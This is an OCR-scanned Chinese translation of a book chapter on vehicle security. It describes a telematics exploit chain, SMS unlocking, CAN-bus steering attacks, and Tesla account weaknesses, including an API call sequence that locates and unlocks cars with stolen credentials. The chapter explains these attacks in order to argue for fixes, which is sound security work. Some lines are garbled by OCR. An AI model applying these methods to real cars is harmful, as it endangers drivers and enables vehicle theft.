大 学 迁 戈 分 校 和 华盛顿 大 学 的 研究 员 声 称 : 通过 Airbiquity 的 aqLink 软 件 支持 已 经 成 功利 用 了 远程 信息 处 理 系统 。 该 软件 允许 通过 信道 传输 关键 数据 ， 通 常用 于 语音 通信 。 这 
很 有 用 ， 因 为 无 线 网 络 用 于 语音 通信 有 比 网 络 具 有 更 大 的 覆盖 范围 ， 如 GSM、CDMA、3G 等 。 


类 似 的 情况 ， 研 究 人 员 Mathew Solnik 和 Don Bailey 发 现 了 一 种 方法 ， 利 用 短 消 息 服 务 (SMS) 远程 打开 Subaru Outback 甚 至 发 动 汽车 。 他 们 做 了 题 为 “战争 短信 ”的 演 
讲 ， 可 供 下 载 。 


研究 人 员 能 够 找到 分 配给 汽车 的 实际 电话 号 码 ， 并 拨打 它 收听 起 始 音 。 因 为 aqLink 使 用 音频 信道 传输 数字 数据 ， 这 是 研究 人 员 采 用 逆向 工程 协议 的 第 一 步 。 和 白皮书 不 讨论 
实际 利用 的 攻击 代码 ， 但 研究 人 员 称 他 们 发 现在 aqLink 实 施 过 程 中 的 各 种 缓冲 区 溢出 。 他 们 设计 了 一 个 利用 14 秒 去 传输 的 漏洞 ， 但 研究 发 现 ， 收 到 信息 12 秒 后 汽车 的 远程 信 
息 处 理 单元 将 终止 通话 。 


为 了 绕 开 这 个 限制 ， 他 们 发 现 了 aqLink 认 证 算法 中 的 男 一 个 缺陷 ， 它 用 来 负责 鉴别 来 电 身 份 确认 他 们 是 合法 来 源 。 研 究 人 员 发 现 汽车 在 接 到 电话 后 会 发 起 一 个 身份 验证 的 
挑战 。 用 最 简单 的 术语 来 说 ， 这 意味 着 该 车 期 竺 来电， 如果 合法 ， 能 够 知道 一 个 共享 的 密码 用 来 应 对 挑战 的 正确 答案 。 在 大 多 数 情况 下 ， 使 用 随机 令 牌 (随机 数 ) 以 确保 不 
复发 送 相同 的 挑战 。 然 而 ， 当 关闭 后 再 重新 开启 时 ， 发 现 该 车 将 使 用 相同 的 随机 数 序列 。 这 导致 了 一 种 情况 ， 研 究 人 员 可 以 捕获 到 一 个 合法 的 挑战 响应 ， 并 重新 传送 给 刚刚 被 
打开 的 汽车 (又 称 为 重 放 攻 击 ) 。 此 外 ， 发 现 汽车 每 256 次 能 够 接收 一 次 不 正确 的 响应 。 因 此 ， 研 究 者 能 够 通过 反复 呼叫 并 在 平均 128 次 呼叫 后 绕 过 验证 体系 ， 获 取 汽 车 的 身 


份 验证 。 


ma 


一 旦 通过 验证 ， 研 究 人 员 能 够 将 超时 时 间 从 12 秒 改 为 60 秒 ， 然 后 重新 呼叫 该 汽车 发 送 较 早 发 现 的 缓冲 区 溢出 漏洞 。 通 过 这 种 方式 ， 研 究 人 员 证 明 他 们 能 够 远程 呼叫 汽车 ， 
并 且 接 管 远程 信息 处 理 控制 单元 。 信 息 处 理 控制 单元 在 CAN 总 线 上 ， 他 们 能 够 进一步 影响 汽车 的 其 他 方面 ， 例 如 通过 闪烁 的 TPMS ECU 系 统 ， 用 自 定义 代码 来 触发 恶意 通知 数 
据 包 。 


6.2.4 ”显著 攻击 面 


偷偷 地 控制 远程 信息 处 理 控制 单元 的 能 力 ， 呈 现 了 一 个 攻击 面 ， 其 含义 是 深远 的 。 攻 击 者 能 入 侵 一 个 ECU， 然 后 入 侵 其 他 ECU 的 攻击 者 并 注入 假 数据 包 ， 引 发 汽车 减速 、 
加 速 、 停 止 ， 或 打开 车 门 。 当 然 ， 不 同 车 这 种 情况 的 细节 会 有 所 不 同 ， 因 为 不 同 的 车 在 体系 结构 上 是 有 差异 的 。 一 些 制造 商 在 CAN 总 线 的 领域 之 外 实现 硬件 功能 ， 而 另外 一 些 
制造 商 可 能 依赖 这 样 一 个 观念 “每 个 在 CAN 总 线 上 的 数据 包 都 是 可 信 的 ”。 


这 里 要 关注 的 是 ， 在 这 样 一 个 场景 中 ， 攻 击 者 可 能 同时 滥用 远程 可 利用 的 条 件 〈 例 如， 尝试 利用 尽 可 能 多 的 汽车 ) 。 这 种 暴力 攻击 对 攻击 者 来 说 可 能 产生 更 大 的 成 果 ， 因 
为 每 一 次 成 功 地 尝试 都 将 导致 汽车 解锁 并 发 送 汽车 当前 的 全 球 定位 系统 (GPS) 坐标 。 想 象 一 下 ， 在 这 种 情况 下 ， 一 个 攻击 者 通过 这 种 方式 能 够 获得 数 百 甚至 数 干 辆 汽车 的 控 
制 权 。 疯 狂 的 人 、 敌 对 分 子 ， 甚 至 是 不 怀 好 意 的 恐怖 分 子 都 可 以 远程 侵害 行驶 中 和 车辆 上 的 司机 的 安全 ， 以 此 获得 关注 或 得 到 媒体 报道 ， 这 是 以 伤害 无 训 司 机 为 潜在 代价 的 。 


关于 物理 安全 警报 的 情况 是 明确 和 真实 的 。 还 考虑 到 隐私 的 风险 。 攻 击 者 可 以 很 容易 跟踪 已 经 入 侵 的 汽车 ， 也 可 能 监听 到 高 管 、 企 业 竞争 对 手 ， 或 政治 家 的 私人 谈话 ， 以 
获得 和 滥用 企业 和 个 人 数据 。 不 难 想象 ， 这 可 以 是 自动 的 ， 目 标 选 择 个 人 还 是 公司 取决 于 他 们 的 位 置 。 


我 们 已 经 学 会 检测 计算 环境 中 的 异常 数据 ， 以 此 确定 是 否 为 值得 我 们 注意 的 可 疑 活动 。 这 可 以 简单 地 通过 寻找 网 络 端 口 扫描 活动 或 各 种 相关 的 日 志 来 源 (如 电子 邮件 、 杀 
毒 软件 和 主机 入 侵 检测 系统 等 ) 获得 更 多 的 情报 。 主 流 车 辆 不 认为 这 是 允许 通过 蓝牙 和 蜂窝 网 络 进行 短 距离 和 长 距离 的 通信 的 方法 。 例 如 ，Miller 和 Valasek 在 他 们 的 文章 中 
jezl: 


RT EJECANAIE 6, AUT IE HBECANTI AER, Mu RECANE EMI JE IE Aedes JGGECANAE EN GAT EXP TT, IRIBECUMMEJIR b. AE 
上 ，PSCM ECU 完 全 关闭 。 这 使 得 转向 时 不 再 提供 辅助 ， 轮 子 很 难 移动 ， 转 动 超过 45% 的 时 候 无 论 你 怎么 努力 都 无 法 移动 。 这 意味 着 受到 这 样 的 攻击 ， 车 辆 不 再 进行 急 转 弯 ， 


而 仅仅 是 逐渐 转向 。 


拒绝 服务 攻击 是 最 容易 发 现 的 问题 之 一 ， 鉴 于 攻击 产生 的 噪音 (包括 大 量 的 网 络 流量 ) 。 这 辆 车 应 该 能 够 注意 到 大 量 CAN 数 据 包 ， 意 识 到 可 疑 的 活动 正在 发 生 。 汽 车 应 采 
用 后 备 方案 在 事件 发 生 时 保证 驾驶 员 和 乘客 的 安全 。 


此 外 ， 很 明显 大 部 分 ECU 软 件 在 研究 者 看 来 都 包含 基本 的 软件 缺陷 ， 如 缓冲 区 溢出 漏洞 、 依 赖 不 明确 和 不 好 的 密码 实现 (重复 出 现 的 问题 ) 。 本 章 所 讨论 的 汽车 厂商 没有 
投资 分 析 代 码 ， 以 便 发 现 和 修复 最 基本 的 安全 问题 ， 而 这 在 软件 开发 社区 中 是 众所周知 的 。 除 了 分 析 代码 ， 汽 车 制造 商 应 该 把 远程 信息 处 理 系统 设计 为 连接 到 一 个 受信 任 的 目 
的 地 ， 而 不 是 接受 传 入 的 连接 。 


过 去 20 年 ， 如 果 笔 记 本 电脑 和 台式 机 在 同一 个 局 域 网 络 内 ， 我 们 认为 它们 彼此 可 以 信任 ， 现 在 我 们 知道 并 非 如 此 。 局 域 网 络 上 的 设备 被 入 侵 的 几率 很 高 ， 因 此 在 同一 网 络 
上 不 采用 端点 保护 这 种 架构 保证 他 们 自己 的 安全 是 不 可 接受 的 。 但 今天 大 多 数 汽车 都 采用 这 种 架构 ， 因 为 在 CAN 总 线 上 的 ECU 采 用 信任 数据 包 的 完整 性 和 真实 性 。 过 去 ， 这 种 
设计 带 来 的 风险 是 可 接受 的 ， 因 为 它 需要 对 汽车 进行 物理 访问 。 然 而 ， 正 如 我 们 在 这 一 节 所 看 到 的 ， 研 究 已 经 证 明 这 种 方法 可 以 被 远程 利用 ， 这 可 能 会 损害 汽车 司机 和 乘客 的 
生命 安全 和 隐私 。 攻 击 者 这 么 做 的 动机 有 很 多 ， 可 能 只 是 一 个 简单 的 恶作剧 ， 也 有 可 能 是 针对 个 人 有 目的 的 攻击 ， 甚 至 有 可 能 是 针对 众多 汽车 车 主 和 乘客 的 恐怖 行为 。 


本 节 重 要 的 一 点 是 ， 今 天 发 现 的 汽车 漏洞 源 于 对 内 存 管理 基本 原则 的 忽视 ， 缺 乏 实 用 密码 学 和 基本 的 安全 控制 的 内 容 。 未 来 ， 汽 车 将 更 依赖 无 线 连 接 。 我 们 应 该 从 今天 所 
犯 的 错误 中 吸取 教训 ， 我 们 能 创造 车 是 为 了 保障 司机 和 乘客 的 安全 ， 而 不 是 暴露 出 漏洞 ， 让 攻击 者 滥用 。 


6.3 ” 特 斯 拉 Model S 


特 斯 拉 汽 车 、SpaceX 公 司 和 埃 隆 马 斯 克 (Elon Musk) 这 些 词 已 成 为 不 懈 创 新 的 代名词 。SpaceX 公 司 的 最 终 目标 是 降低 太空 旅行 的 成 本 ， 使 人 类 可 以 迁移 到 其 他 星球 。 
特 斯 拉 汽车 的 目标 是 加 深 我 们 对 如 何 能 够 提供 更 有 效 和 更 清洁 的 能 量 的 了 解 ， 该 公司 已 经 证 明了 这 一 点 ， 并 发 售 了 一 款 最 安全 最 快 的 四 门 电动 轿车 Model S。 特 斯 拉 的 最 终 目 
示 是 给 市 场 带 来 一 辆 负担 得 起 的 电动 汽车 。 埃 隆 : 马 斯 克 ， 这 位 出 生 于 南非 的 工程 师 作为 SpaceX 公 司 和 特 斯 拉 的 高 管 ， 带 领 这 两 家 公司 走向 成 功 。 


用 马 斯 克 的 话说 : “我 真 没有 想到 特 斯 拉 会 成 功 。 我 想 我 们 很 可 能 会 失败 。 但 是 我 们 至 少 可 以 担 转 人 们 认为 的 电动 汽车 必须 是 丑陋 的 ， 像 高 尔 夫 球 车 一 样 缓慢 和 沉闷 的 错 
误 看 法 。”Model S 远 比 缓慢 的 高 尔 夫 球 车 快 。P85+ 型 特 斯 拉 ( 见 图 6-3) 具有 416 马 力 [1]， 从 0 加 速 到 60 英 里 四 /小 时 只 需 4.2 秒 。P85D 型 特 斯 拉 有 691 马 力 ， 能 够 在 3.2 秒 达 
到 60 英 里 /小 时 。 对 于 全 电动 汽车 来 说 ， 这 一 动力 值 是 惊人 的 ， 前 所 未 有 的 。 


图 6-3: 特 斯 拉 S 型 P85+ 


每 位 特 斯 拉 车 主 都 有 权 免 费 使 用 数 百 个 特 斯 拉 超级 充电 站 (如 图 6-4 所 示 ) ， 他 们 有 战略 地 部 署 在 整个 北美 地 区 和 部 分 亚太 地 区 和 欧洲 地 区 。 这 些 充 电站 可 以 在 不 到 30 分 
钟 内 充 好 一 辆 车 ， 行 驶 170 英 里 。 这 些 充 电站 让 特 斯 拉 车 主 们 轻松 地 进行 越野 旅行 也 无 需 付 充电 费用 。 没 有 其 他 电动 汽车 公司 能 在 基础 设施 上 做 出 如 此 惊人 的 投资 ， 这 已 经 将 
特 斯 拉 定位 为 世界 领先 的 电动 汽车 公司 之 一 。 


www.teslamotors.corm/supercharger e 


358 Supercharger stations with 1,956 Superchargers - 


图 6-4: 特 斯 拉 充 电站 


图 6-5 所 描绘 的 中 心 显示 的 是 汽车 的 流行 特征 。 显 示 屏 不 仅 可 以 控制 媒体 ， 访 问 导 航 ， 打 开 后 视 摄像 头 ， 还 可 以 调整 晤 挂 ， 打 开 全 景 天 窗 ， 开 关门 锁 ， 调 整 高 度 和 车 辆 制 
动 。 这 些 都 通过 触摸 屏 来 操作 。 


$ “al 


Settings 


Suspension 


Driving 


图 6-5: 特 斯 拉 Model S 的 中 央 显 示 器 


Model S 常 被 称 为 “车 轮 上 的 电脑 ”， 因 为 它 通 过 3G 连 到 互联 网 。 通 过 软件 更 新 提供 新 功能 。 例 如 ， 防 止 汽车 在 坡 道上 溜 车 的 “上 坡 辅助 ”功能 通过 3G 网 进行 软件 更 新 
自动 交付 。 这 是 革命 性 的 ， 因 为 在 其 他 车 辆 上 安装 这 样 的 功能 需要 把 车 送 到 经 销 商 或 维修 站 那里 。 


特 斯 拉 是 公认 的 电动 车 领域 的 领先 创新 者 ， 而 且 特 斯 拉 的 架构 很 可 能 将 激励 其 他 厂商 。 永 远 在 线 的 3G 连 接 和 汽车 软件 自动 进行 更 新 的 能 力 使 Model 3 成 为 一 个 真正 与 司机 
和 乘客 的 安全 和 隐私 息息相关 的 物 联网 设备 。 本 节 ， 我 们 将 了 解 Model S 的 一 些 特点 ， 并 从 安全 的 角度 分 析 它 的 设计 。 这 有 助 于 我 们 了 解 如 何 设计 引领 未 来 的 安全 汽车 ， 以 及 
在 此 期 间 我 们 需要 做 什么 样 的 改进 。 


不 要 使 用 弱 密码 ， 大 多 数 主 流 的 在 线 服务 要 求 用 户 选 择 一 个 复杂 度 合理 的 密码 ， 这 些 都 是 常识 。 否 则 ， 用 户 倾向 于 选择 容易 被 猜 到 的 密码 ， 攻 击 者 可 能 利用 这 种 情况 通过 
猜测 密码 的 组 合 (也 称 为 暴力 破解 攻击 ) 访问 受害 者 的 账户 。 如 图 6-6 所 示 ， 特 斯 拉 的 老 网 站 采用 6 个 字符 长 度 的 密码 ， 包 含 一 个 字母 和 一 个 数字 。 这 人 允许 有 弱 密码 ， 如 
password1、tesla123 等 。 根 据 最 近 的 一 项 调查 ，123456 仍 然 是 一 个 最 常用 的 密码 ， 而 abc123 排 在 第 14 位 (这 个 密码 能 通过 特 斯 拉 网 站 的 复杂 性 要 求 ) 。 此 外 ， 特 斯 拉 的 网 
站 (和 它 的 iOs 应 用 程序 ， 如 图 6-7 所 示 ) 原来 并 没有 采用 任何 密码 锁定 策略 ， 使 潜在 的 攻击 者 可 以 无 限 次 地 猜测 目标 密码 。 攻 击 者 猜 到 密码 后 ， 可 以 使 用 应 用 程序 找到 目标 汽 
车 的 实际 位 置 ， 不 仅 如 此 ， 攻 击 者 还 可 以 开锁 ， 启 动 并 驾驶 汽车 。 


First name: 
Chris 

Las! name: 
Christie 

Email Address: 
idlovemeatesla@gmail.com 


Password: 
For your sacurty, please provide a password at 


least six characters bong het contains at least one 
numbor and ono lottor. 


Confirm password: 


Ed CREATE ACCOUNT 


图 6-6: 长 度 为 6 字符 的 密码 复杂 度 ， 要 求 至 少 包含 一 个 字母 和 一 个 数字 


Controls 


VENT ROOF 


UNLOCK 


HONK HORN FLASH LIGHTS 


Controls 


图 6-7: 特 斯 拉 的 iPhone 应 用 程序 


特 斯 拉 在 2014 年 4 月 更 新 了 其 密码 复杂 度 需求 ， 最 少 8 个 字符 ， 且 包含 一 个 字母 和 一 个 数字 。 前 面 提 到 的 调查 中 排 在 第 25 位 最 常见 的 密码 trustno1 能 满足 这 一 要 求 。 特 斯 
拉 还 采用 了 一 个 密码 锁 的 策略 ， 连 续 6 次 登录 失败 便 锁 定 该 账户 。 当 账户 被 锁定 时 ， 用 户 可 以 请 求 一 个 密码 重 置 链接 发 送 到 文档 中 记录 的 电子 邮件 地 址 。 


特 斯 拉 提 高 密码 复杂 性 要 求 并 采用 锁定 策略 可 能 会 阻止 一 部 分 攻击 者 ， 但 这 不 足以 阻止 那些 执着 的 攻击 者 ， 他 们 仍 可 以 采用 传统 的 攻击 策略 ， 如 通过 网 络 钓鱼 获取 受害 人 
的 密码 。 他 们 只 需 建立 了 一 个 看 起 来 合法 的 特 斯 拉 网 站 ， 引 诱 车 主 提交 其 身份 凭据 。 这 种 类 型 的 攻击 比较 容易 实施 ， 每 天 有 数 干 人 成 为 钓鱼 攻击 的 受害 者 。2011 年 ， 钓 鱼 攻击 
攻破 了 RSA 安 全 产品 密 钥 ， 最 终 导 致 最 大 的 军事 承包 商 之 一 的 洛克 希 德 .马丁 公司 数据 被 破坏 。2013 年 ， 网 络 钓鱼 攻击 导致 Target 网 站 110 万 个 客户 记录 和 信用 卡 信息 受到 侵 
害 。 


特 斯 拉 Model S API 项 目 描述 了 特 斯 拉 的 iOS 应 用 程序 和 特 斯 拉 的 云 基础 设施 之 间 的 通信 情况 。 该 应 用 程序 连接 到 服务 器 portal.vn.teslamotors.com 进 行 验证 ， 并 基于 和 凭 
据 授 权 。 一 旦 登录 ， 用 户 就 可 以 连接 到 服务 器 发 出 命令 (如 打开 和 车门 ) 并 收 到 关于 汽车 (如 汽车 的 位 置 ) 的 信息 。 恶 意 用 户 也 可 以 使 用 这 项 服务 使 他 们 的 工作 自动 化 。 考 虑 一 
个 情况 ， 即 攻击 者 已 经 拦截 到 几 百 位 特 斯 拉 业 主 的 凭据 。 攻 击 者 可 以 编写 一 个 简单 的 脚本 程序 使 用 API 快 速 找到 所 有 汽车 的 位 置 并 解锁 ， 如 以 下 步骤 : 


1. 向 /login 提 交 请 求 ， 用 受害 人 的 电子 邮件 和 密码 填写 user_session 空 白 内 容 ， 登 录 到 被 盗 账户 。 


2. 向 /vehicles 提 交 一 份 申请 ， 得 到 与 受害 人 的 账户 相关 联 的 所 有 特 斯 拉 汽 车 的 清单 。 


3. 向 /vehicles/{idycommand/drive_state 提 交 一 个 请 求 ，{id} 是 汽车 身份 相关 的 值 。 这 个 请 求 将 以 经 纬度 的 形式 返回 汽车 的 位 置 。 


4. 向 /vehicles/{idj/command/door_unlock 提 交 一 个 请 求解 锁 汽 车 。 


很 明显 ， 单 因素 身份 验证 只 需要 用 户 名 和 密码 ， 即 使 密码 复杂 度 符合 要 求 并 具有 账户 锁定 的 政策 ， 也 不 足以 保护 车 辆 的 安全 性 。 因 为 简单 传统 的 钓鱼 攻击 就 能 允许 恶意 用 
户 定位 、 解 锁 ， 甚 至 启动 汽车 。 攻 击 者 只 需 从 特 斯 拉 网 站 要 求 密码 重 置 ， 并 获得 用 户 的 特 斯 拉 账 户 。 花 点 时 间 思 考 一 下 这 种 情况 的 影响 ， 攻 击 者 入 侵 特 斯 拉 车 主 的 email 账 户 
就 能 够 找到 并 偷 走 这 个 人 的 汽车 。 


用 户 总 是 在 多 个 网 站 服务 上 重复 利用 相同 的 认证 信息 。 这 种 情况 会 使 得 攻击 者 攻击 了 一 个 主要 的 网 站 后 ， 尝 试 使 用 相同 的 密码 认证 信息 进入 其 他 服务 ， 例 如 特 斯 拉 网 站 和 
iOS 应 用 程序 。 我 们 也 看 到 了 每 天 的 主要 密码 泄露 情况 : 这 些 都 很 容易 通过 像 LeakedIn 这 样 的 项 目 收集 和 报告 已 被 公开 暴露 的 凭据 。 攻 击 者 可 以 简单 地 使 用 来 自 这 种 泄露 的 用 
户 名 和 密码 尝试 登录 特 斯 拉 的 iOS 应 用 程序 ， 或 是 自动 处 理 之 前 描述 的 定位 和 解锁 汽车 。 


这 向 我 们 展示 了 传统 的 攻击 手段 是 如 何 被 滥用 的 新 视角 ， 这 种 方式 不 仅 可 以 获得 受害 者 的 在 线 信息 ， 如 电子 邮件 和 即时 消息 ， 而 且 能 够 偷 到 一 辆 豪华 车 。 然 而 重点 是 : 物 
联网 设备 能 够 在 3.2 秒 内 从 0 加 速 到 60 英 里 每 小 时 ， 不 应 该 受到 单 因素 身份 验证 导致 的 传统 攻击 方式 的 攻击 。 我 们 也 知道 ， 与 恶意 软件 有 关 的 僵尸 网 络 总 是 结合 新 的 方法 来 定位 
和 掠夺 用 户 信息 。 如 果 像 特 斯 拉 这 样 的 公司 继续 实施 弱 控 制 ， 如 传统 的 用 户 名 和 基于 密码 的 身份 验证 ， 很 有 可 能 恶意 软件 开发 者 将 试图 寻找 和 捕捉 这 些 凭据 。 由 于 恶意 软件 的 
特定 菌株 可 以 入 侵 数 以 百 万 计 的 笔记 本 电脑 和 台式 机 ， 这 将 导致 大 量 连 接 的 车 辆 可 能 会 受到 入 侵 ， 并 且 被 坐 藻 在 世界 各 地 的 僵尸 网 络 牧 民 进 行 远程 访问 。 


6.3.2， 特 斯 拉 员 工 的 社会 工程 学 和 位 置 隐私 的 探索 
对 于 大 多 数 人 来 说 ， 离 开车 忘记 拿 车 钥匙 或 忘记 锁 车 是 极 少数 的 。 但 真 遇 到 这 种 情况 ， 特 斯 拉 车 主 能 够 通过 iOS 应 用 程序 解锁 车 辆 。 当 他 们 无 法 使 用 该 应 用 程序 时 ， 可 以 


致电 客户 服务 和 请 求 为 他 们 的 车 解锁 (如 图 6-8 所 示 ) 。 
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LOCKED OUT - LET IN < RITORNO A TESLA MODEL S D 
David Jay | 30 DICEMBRE 2012 


Justa reminder. If your key tod Is in your bag you are able to walk up to a door, including the rear 
hatch, and unlock it but | returned to the airport last night and opened tho rear and put my bags in and 
closed the door and was instantly locked cut of everything. It was kinda surprising that even with the 
kay right there, inside tne car, I couldn't open any door. 


Fortunately Tesia can remote unicck your door and | called the support number and Freddie. | believe 
it was, helped me out and was fantastic. Calling back a fow times to make sure everything was cool. 
Really it was fantaslic service. 


So friendly reminder - don't put your keys in the back and if youre an idiot like me and you do it then 
Tesla can bail you out 


:) 
dj 
stevenmaifert | 30 DICEMBRE 2012 


I have their number on speed dial :) 


图 6-8: 特 斯 拉客 户 服务 能 够 远程 解锁 汽车 
特 斯 拉 员工 远程 解锁 汽车 对 客户 肯定 是 有 帮助 的 ， 但 不 清楚 客户 服务 代表 是 如 何 验证 车 主 的 合法 身份 的 。 特 斯 拉 还 没有 公布 确切 的 实际 指南 : 究竟 需要 验证 哪些 信息 。 这 
可 能 会 造成 这 样 一 种 情况 ， 个 人 能 够 尝试 社会 工程 攻击 特 斯 拉客 户 支 持 人 员 以 便 进入 一 辆 汽车 。 


目前 还 不 清楚 特 斯 拉 员工 在 授予 解锁 任何 特 斯 拉 汽 车 的 权利 之 前 ， 究 竟 都 受到 什么 样 的 背景 检查 。Uber 是 一 家 基于 应 用 软件 的 出 租车 公司 ， 最 近 面 临 公司 员工 侵犯 用 户 
隐私 的 审查 ， 一 些 员工 已 经 访问 了 所 有 用 户 的 数据 (内 部 称 之 为 上 帝 视角 ) ， 包 括 他 们 从 哪里 上 车 ， 到 哪里 下 车 。 事 实 上 ，Uber 员 工 在 他 们 的 博客 上 吹 咕 : 能 够 识别 出 深夜 
前 往 某 个 地 点 从 事 “ 愉 快 ”行为 的 人 。 (此 内 容 已 被 取 下 ， 但 有 存档 版 本 可 用 。) 


由 于 特 斯 拉 S 型 总 是 通过 3G 连 接 ， 因 此 特 斯 拉 可 以 很 容易 地 收集 到 任何 时 间 每 辆 车 的 位 置信 息 。 然 而 ， 特 斯 拉 没 有 表明 他 们 做 了 哪 几 步 去 确保 仅 有 授权 的 员工 具有 访问 数 
据 的 权限 ， 并 且 如 何 存储 位 置 数据 能 安全 地 对 抗 外 部 实体 ， 这 些 外 部 实体 可 能 对 特 斯 拉 技术 基础 设施 寻求 获得 未 经 授权 的 访问 。 


6.3.3 向 陌生 人 递 出 钥匙 


特 斯 拉 的 iOS 应 用 程序 使 用 web 的 应 用 程序 编程 接口 (API) 进行 通信 ， 给 汽车 发 送 命令 。 特 斯 拉 并 不 打算 将 这 个 API 开 放 给 第 三 方 直接 调用 。 然 而 第 三 方 应 用 程序 已 经 开 
始 利 用 特 斯 拉 的 API 构 建 应 用 程序 。 例 如 ， 特 斯 拉 的 Glass 应 用 让 用 户 使 用 Google Glass 监视 和 控制 他 们 的 特 斯 拉 。 为 了 使 用 这 个 功能 ，Google Glass 的 拥有 者 不 得 不 授权 并 
增加 这 个 应 用 。 一 旦 完成 这 一 步 ， 用 户 被 重 定向 到 登录 页 面 ， 如 图 6-9 所 示 。 用 户 输入 用 户 赁 证， 登录 到 他 的 特 斯 拉 账户 和 iOS 应 用 程序 账户 。 


TESLA for Glass DISCONNECT 


图 6-9: Tesla for Glass 软件 的 登录 页 面 


但 是 ， 当 用 户 录入 他 的 登录 信息 并 点 击 CONNECT 键 时 ， 用 户 名 和 密码 被 发 送 到 第 三 方 服务 (teslaglass.appspot.com) ， 如 图 6-10 所 示 。 这 基本 上 是 把 一 个 人 的 车 钥匙 
交 给 一 个 完全 陌生 的 人 ! 


eoo Burp Suite Free Edition v1.5 
Burp Intruder Repeater Window Help 


Target , Proxy. Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Options | Alerts 


s een [osons] 


A Request to https:/ /teslaglass.appspot.com:443 [74.125.200.141] 
— Forwad |[ Drop m , Intercept is on | Action P Comment this ite (85) (2) 


(sas [rooms [rests [s] 


POST / HTTP/1.1 à 
Host: teslaglass.appspot.com 

Accept: text/html,application/xhtmnl-cxml,application/xml;dq-0.9,*/*;q-0.8 

Proxy-Connection: keep-alive 

Accept-Encoding: gzip, deflate 

Accept-Language: en-us 

Content-Type: application/x-www-form-urlencoded 

Origin: https://teslaglass.appspot.com 

Content-Length: 67 

Connection: keep-alive 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0S X 10 9 2) AppleWebKit/537.74.9 (KHTML, like Gecko) 
Version/7.0.2 Safari/537.74.9 

Referer: https://teslaglass.appspot.ccom/ 

DNT: 1 


Cookie: userid-[removed] 


图 6-10: 由 第 三 方 应 用 程序 收集 特 斯 拉 网 站 的 凭证 
图 6-10 描 绘 了 Butp Suite 工 具 。 这 是 一 个 免费 的 工具 ， 可 以 作为 代理 服务 器 捕获 和 修改 HTTP 内 容 。 在 这 种 情况 下 ， 我 们 用 它 来 截获 到 teslaglass.appspot.com 的 HTTP 请 求 
并 确定 实际 传输 的 内 容 。 


也 就 是 说 ， 尽 管 特 斯 拉 Glass 应 用 软件 并 不 是 由 特 斯 拉 书 面 或 官方 认可 的 ， 但 是 它 仍然 能 接收 到 选择 使 用 它 的 用 户 的 实际 凭证 。 这 表明 存在 恶意 的 第 三 方 应 用 软件 拥有 者 
滥用 这 种 情况 收集 特 斯 拉 账 户 持 有 人 的 凭据 的 风险 。 正 如 我 们 以 前 看 到 的 ， 这 些 赁 证 可 以 让 任何 人 找到 与 账户 相关 的 汽车 ， 解 锁 他 们 ， 甚 至 是 驾驶 他 们 。 


这 种 情况 造成 的 另 一 个 风险 是 第 三 方 基础 设施 可 能 遭 到 入 侵 。 这 个 问题 已 经 由 George Reese 在 社区 中 提出 。 马 斯 克 已 经 确认 ， 特 斯 拉 计划 最 终 将 为 第 三 方 开 发 者 发 布 
SDK。 特 斯 拉 倡 导 的 解决 方案 很 可 能 将 包含 访问 远程 接口 、 本 地 沙 箱 、 具 有 类 似 OAuth 一 样 的 授权 功能 ， 以 及 审批 过 程 ， 其 灵感 来 自 苹 果 应 用 程序 商店 。 


也 许 特 斯 拉 不 能 直接 完全 指责 其 客户 将 赁 据 交 给 第 三 方 。 然 而 ， 传 统 的 基于 密码 的 系统 特性 产生 了 这 个 结果 ， 并 在 这 种 情况 下 存在 问题 。 不 应 该 把 责任 推 到 车 主 身上 (在 
大 多 数 情 况 下 ， 将 其 证 书 广播 给 第 三 方 应 用 程序 是 无 意 的 ) ， 这 个 问题 可 以 补救 的 唯一 方法 是 由 特 斯 拉 提 供 一 个 生态 系统 ， 并 定义 和 鼓励 安全 开发 和 审核 应 用 程序 。 


6.3.4 借用 别人 的 电话 


特 斯 拉 iOS 应 用 程序 存储 了 一 个 令 牌 ， 令 牌 由 应 用 程序 中 Library/Cookies/ 目 录 下 的 API 成 功 身份 认证 后 生成 ， 存 储 在 名 为 Cookies.binarycookies 的 文件 中 。 物 理 访问 到 
特 斯 拉 拥 有 者 电话 的 任何 人 能 够 使 用 像 PhoneView 一 样 的 工具 捕获 这 个 文件 ， 如 图 6-11 所 示 。 


e^e PhoneView - IPhone 6+ 
4 neo o 
QM Copy To iPhone Copy From iPhone Deleto Settings S. NN 
Y DATA .com.apple.mobile container ma Ml Caches [4 Bh Cookies.binarycookies 
€ pix E Documents » MM Cookies > 
14 contacis E Library » Ml Preferences » 
I Notes MM StoreKit » SSLPins.plist 
B Call Log m tmp » 


G Mossagee 
®© web 
153 voicemail Namo: 


Cookies.binarycookies 
Type: Document 


Y MEDIA Size: 717 Bytes 
Modified: 1/30/15 

JI Music 
F1 videos 
四 Books 
(A Podcests 
A Ringtenee 
E Photos 
2 Voice Memos 


e A iPhone 6+ Connected via USB (85669.8 MB Available) 


图 6-11: 苹果 手机 包含 的 身份 认证 令 牌 在 Cookies.binarycookies 文 件 中 


任何 临时 访问 特 斯 拉 拥 有 者 的 手机 都 能 窃取 到 这 个 文件 的 内 容 ， 直 接 请 求 控制 API 功 能 。 此 会 话 令 牌 的 值 已 被 证 明 具 有 3 个 月 的 有 效 期 。 


发 生 这 种 情况 的 可 能 性 很 低 ， 因 为 它 需要 物理 访问 车 辆 拥有 者 的 电话 。 然 而 ， 与 简单 的 临时 访问 的 物理 密 匙 不 同 (在 电话 中 所 扮演 的 角色 ) ， 即 使 返还 电话 ， 潜 在 的 恶意 
实体 将 有 长 期 访问 的 功能 。 


然而 ， 再 次 给 业主 带 来 的 风险 是 : 由 于 依赖 传统 的 用 户 名 和 密码 凭据 ， 用 户 很 有 可 能 依靠 验证 会 话 令 牌 ， 这 样 ， 他 们 不 必 在 每 次 登录 苹果 应 用 程序 的 时 候 都 输入 密码 。 


为 了 改善 这 一 状况 ， 一 个 简单 而 优雅 的 方式 是 : 特 斯 拉 和 其 他 汽车 制造 商 在 操作 系统 中 采用 内 置 的 身份 验证 和 授权 功能 ， 如 苹果 的 iOS 系 统 。 最 新 的 苹果 手机 的 指纹 识别 
传感器 能 安全 地 保存 部 分 指纹 数据 ， 可 以 很 容易 快速 地 验证 ， 苹 果 公 司 已 经 向 第 三 方 开发 者 开放 了 指纹 识别 应 用 程序 接口 的 使 用 。 特 斯 拉 可 以 也 应 该 使 用 这 个 框架 ， 以 进一步 
保护 车 主 的 安全 ， 关 键 使 用 时 要 求 使 用 指纹 识别 ， 如 解锁 和 启动 汽车 。 


